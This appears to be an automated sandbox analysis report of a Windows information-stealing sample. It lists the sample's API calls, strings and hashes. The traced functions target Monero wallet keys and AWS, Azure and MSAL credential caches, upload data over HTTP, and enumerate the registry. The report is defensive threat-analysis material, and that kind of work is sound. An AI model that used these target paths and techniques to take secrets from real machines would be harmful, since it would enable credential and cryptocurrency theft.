Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 94fab5d95ebb979cba36b4dc38c48debd30d35654978ab1dfd1450dae2a9c2a1
Instruction ID: 00b335371a12065a2f29777d32b84a6958ee8be1610edf9aea6c78bf6b236e17
Opcode Fuzzy Hash: 94fab5d95ebb979cba36b4dc38c48debd30d35654978ab1dfd1450dae2a9c2a1
Instruction Fuzzy Hash: AD121171820918BADB1AEBA0DC95FEE7778BF14704F504199F206AA891DF302E49DF61

Function 003ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B8B60: GetSystemTime.KERNEL32(003C0E1A,00F3CC78,003C05AE,?,?,003A13F9,?,0000001A,003C0E1A,00000000,?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003B8B86

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003ACF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003AD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 003AD0CE
lstrcat.KERNEL32(?,00000000), ref: 003AD208
lstrcat.KERNEL32(?,003C1478), ref: 003AD217
lstrcat.KERNEL32(?,00000000), ref: 003AD22A
lstrcat.KERNEL32(?,003C147C), ref: 003AD239
lstrcat.KERNEL32(?,00000000), ref: 003AD24C
lstrcat.KERNEL32(?,003C1480), ref: 003AD25B
lstrcat.KERNEL32(?,00000000), ref: 003AD26E
lstrcat.KERNEL32(?,003C1484), ref: 003AD27D
lstrcat.KERNEL32(?,00000000), ref: 003AD290
lstrcat.KERNEL32(?,003C1488), ref: 003AD29F
lstrcat.KERNEL32(?,00000000), ref: 003AD2B2
lstrcat.KERNEL32(?,003C148C), ref: 003AD2C1
lstrcat.KERNEL32(?,00000000), ref: 003AD2D4
lstrcat.KERNEL32(?,003C1490), ref: 003AD2E3

Part of subcall function 003BA820: lstrlen.KERNEL32(003A4F05,?,?,003A4F05,003C0DDE), ref: 003BA82B
Part of subcall function 003BA820: lstrcpy.KERNEL32(003C0DDE,00000000), ref: 003BA885

lstrlen.KERNEL32(?), ref: 003AD32A
lstrlen.KERNEL32(?), ref: 003AD339

Part of subcall function 003BAA70: StrCmpCA.SHLWAPI(00F38608,003AA7A7,?,003AA7A7,00F38608), ref: 003BAA8F

DeleteFileA.KERNEL32(00000000), ref: 003AD3B4

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 3e30da655e7f42d2ebc2f32f0b25c0214f3947a4dc6e82698879f202602e40d0
Instruction ID: 8e470c6a487d6284a15ff81c9d14a751d18b565fc75181004afedb6f109e25a0
Opcode Fuzzy Hash: 3e30da655e7f42d2ebc2f32f0b25c0214f3947a4dc6e82698879f202602e40d0
Instruction Fuzzy Hash: DBE13271910908ABCB0AEBB0DD96EEE7778AF14305F104158F247FA491DE35BE09DB62

Function 003A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
Part of subcall function 003A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A4915
StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003C0DDB,00000000,?,?,00000000,?,",00000000,?,00F3F098), ref: 003A4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003A4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003A4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003A4E49
InternetCloseHandle.WININET(00000000), ref: 003A4EAD
InternetCloseHandle.WININET(00000000), ref: 003A4EC5
HttpOpenRequestA.WININET(00000000,00F3EFB8,?,00F3E630,00000000,00000000,00400100,00000000), ref: 003A4B15

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

InternetCloseHandle.WININET(00000000), ref: 003A4ECF

Strings

------, xrefs: 003A4C69
", xrefs: 003A4BF2
------, xrefs: 003A4B28
------, xrefs: 003A49BD
", xrefs: 003A4D33

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 14813ff5c3fcc2cd982c9984d28eb1365582c56c03085364793a3a0d8aec0583
Instruction ID: 034816f8139d99ac9d81d2f29dbd66fa0e0fd4d0de761754b7360123f057b7ed
Opcode Fuzzy Hash: 14813ff5c3fcc2cd982c9984d28eb1365582c56c03085364793a3a0d8aec0583
Instruction Fuzzy Hash: C1121371910A18AADB16EB50DCA2FDEB778BF14304F504199F206BA891DF702F49DF62

Function 003B8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

RegOpenKeyExA.KERNEL32(00000000,00F39E30,00000000,00020019,00000000,003C05B6), ref: 003B83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003B8426
wsprintfA.USER32 ref: 003B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003B847B
RegCloseKey.ADVAPI32(00000000), ref: 003B848C
RegCloseKey.ADVAPI32(00000000), ref: 003B8499

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Strings

- , xrefs: 003B85A3
%s\%s, xrefs: 003B844D
?, xrefs: 003B837A

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: e755a6bc9002c2c23f4df15d69fee67b0550cf284526d3cac1ff6656fc4e7ec0
Instruction ID: acde97d698d0d29e770a72cb3c527b4462a02c28c53281c9968be0b74e15175f
Opcode Fuzzy Hash: e755a6bc9002c2c23f4df15d69fee67b0550cf284526d3cac1ff6656fc4e7ec0
Instruction Fuzzy Hash: 9C810D71910518ABDB29DB60CC95FEA77BCFF18704F008299E209AA540DF716F89DFA1

Function 003A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
Part of subcall function 003A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

InternetOpenA.WININET(003C0DFE,00000001,00000000,00000000,00000000), ref: 003A62E1
StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A6335
HttpOpenRequestA.WININET(00000000,GET,?,00F3E630,00000000,00000000,00400100,00000000), ref: 003A6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003A63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003A63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003A646D
InternetCloseHandle.WININET(00000000), ref: 003A64EF
InternetCloseHandle.WININET(00000000), ref: 003A64F9
InternetCloseHandle.WININET(00000000), ref: 003A6503

Strings

GET, xrefs: 003A637C
ERROR, xrefs: 003A6407
ERROR, xrefs: 003A64C9

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 0613bcc8a5cabcc8b0358523786304ee6dea3cfea42a23eb6decc4f18807b330
Instruction ID: e53f44f8c43a3cbc340575a4c74db3a9722b6f00d15bcfac66ab09a8a5f84f77
Opcode Fuzzy Hash: 0613bcc8a5cabcc8b0358523786304ee6dea3cfea42a23eb6decc4f18807b330
Instruction Fuzzy Hash: 71716271A00218ABDB25DFA0CC9AFEE7778FB45700F108158F20AAB5D0DBB46A85DF51

Function 003B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA820: lstrlen.KERNEL32(003A4F05,?,?,003A4F05,003C0DDE), ref: 003BA82B
Part of subcall function 003BA820: lstrcpy.KERNEL32(003C0DDE,00000000), ref: 003BA885

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003B5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003B56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003B5857

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003B5228

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003B5318
Part of subcall function 003B52C0: lstrlen.KERNEL32(00000000), ref: 003B532F
Part of subcall function 003B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003B5364
Part of subcall function 003B52C0: lstrlen.KERNEL32(00000000), ref: 003B5383
Part of subcall function 003B52C0: lstrlen.KERNEL32(00000000), ref: 003B53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003B578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003B5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003B5A0C
Sleep.KERNEL32(0000EA60), ref: 003B5A1B

Strings

ERROR, xrefs: 003B5693
ERROR, xrefs: 003B5932
ERROR, xrefs: 003B5636
ERROR, xrefs: 003B59FE
ERROR, xrefs: 003B5849
ERROR, xrefs: 003B577D

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: b027cc186b16b9aa9202d347769a339863bcae0fce9d5cbe78076fb330320721
Instruction ID: c6e5a15e87c9d72dde658f3008839e68a6094001990b1da276b952e67fe9fecf
Opcode Fuzzy Hash: b027cc186b16b9aa9202d347769a339863bcae0fce9d5cbe78076fb330320721
Instruction Fuzzy Hash: 62E15771910A04A6CB1AFBB0DC97EED777CAF55304F408118B646AA891EF346F0DDB92

Function 003B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

lstrcat.KERNEL32(?,00000000), ref: 003B4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 003B4DCD

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B492C
Part of subcall function 003B4910: FindFirstFileA.KERNEL32(?,?), ref: 003B4943

lstrcat.KERNEL32(?,00000000), ref: 003B4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 003B4E59

Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FDC), ref: 003B4971
Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FE0), ref: 003B4987
Part of subcall function 003B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003B4B7D
Part of subcall function 003B4910: FindClose.KERNEL32(000000FF), ref: 003B4B92

lstrcat.KERNEL32(?,00000000), ref: 003B4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 003B4EE5

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B49B0
Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C08D2), ref: 003B49C5
Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B49E2
Part of subcall function 003B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003B4A1E
Part of subcall function 003B4910: lstrcat.KERNEL32(?,00F3F118), ref: 003B4A4A
Part of subcall function 003B4910: lstrcat.KERNEL32(?,003C0FF8), ref: 003B4A5C
Part of subcall function 003B4910: lstrcat.KERNEL32(?,?), ref: 003B4A70
Part of subcall function 003B4910: lstrcat.KERNEL32(?,003C0FFC), ref: 003B4A82
Part of subcall function 003B4910: lstrcat.KERNEL32(?,?), ref: 003B4A96
Part of subcall function 003B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003B4AAC
Part of subcall function 003B4910: DeleteFileA.KERNEL32(?), ref: 003B4B31

Strings

*.*, xrefs: 003B4E64
Azure\.aws, xrefs: 003B4E5F
*.*, xrefs: 003B4DD8
\.IdentityService\, xrefs: 003B4ED9
Azure\.IdentityService, xrefs: 003B4EEB
msal.cache, xrefs: 003B4EF0
Azure\.azure, xrefs: 003B4DD3
\.azure\, xrefs: 003B4DC1
\.aws\, xrefs: 003B4E4D

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
